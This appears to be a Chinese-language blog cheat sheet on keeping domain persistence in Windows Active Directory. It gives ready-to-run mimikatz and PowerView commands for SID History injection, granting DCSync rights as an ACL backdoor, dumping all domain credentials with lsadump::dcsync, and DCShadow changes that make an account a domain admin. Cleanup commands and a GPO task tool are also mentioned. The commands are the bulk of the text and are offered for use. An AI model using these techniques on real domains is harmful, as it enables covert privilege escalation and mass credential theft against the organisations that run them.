针对域环境的权限维持

域内环境中常用的维持权限的方式.

Golden and Silver Ticket.

SID History 为域内用户迁移到新域时针对用户权限的转移而提供的一种手段.

通过 SID History 可让用户拥有不同身份的权限, 在单域中同样有效.

1
mimikatz "privilege::debug" "sid::patch" "sid::add /new:admin-sid /sam:test" "exit"

注意要先进行 sid::patch, 否则会出现 ERROR kuhl_m_sid_add;ldap_modify_s 0x32 (50) 错误.

清除 SID History.

1
mimikatz "privilege::debug" "sid::patch" "sid::clear /sam:test" "exit"

ACL 全称 Access Control List, 即访问控制列表. 故 ACL 后门, 是指针对权限配置缺陷的后门.

ACL 后门的 DCSync 形式.

使用 PowerSploit Dev 分支中的 PowerView.

1
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test -Rights DCSync

这样在任意一台主机上以 test 用户登录都能通过 DCSync 向域控请求账户凭据.

1
mimikatz "lsadump::dcsync /all" "exit"

删除 DCSync 后门.

1
Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity test -Rights DCSync

ACL 后门的 GPO 形式.

通过在组策略管理中添加计划任务批量设置后门.

暂且只给出利用工具, 尚未测试成功.

3gstudent/New-GPOImmediateTask.

通过伪造 DC 并与正常 DC 同步数据的方式修改账户信息. 需要本地系统及域管理员权限.

无需登录 DC, 且只会留下 Directory Service Access 日志, 缺点是可执行的操作较少.

需要将 mimikatz 提升为 system 权限, 通过 mimidrv.sys 实现.

1
2
!+
!processtoken

修改管理员组.

1
lsadump::dcshadow /object:CN=test,CN=Users,DC=test,DC=com /attribute:primarygroupid /value:512

添加 SID History.

1
lsadump::dcshadow /object:CN=test,CN=Users,DC=test,DC=com /attribute:sidhistory /value:admin-sid

最后以域管理员权限启动另一个 mimikatz 进程.

1
lsadump::dcshadow /push

通过 DCShadow 还能够修改其它信息, 具体请在"属性编辑器"里查询.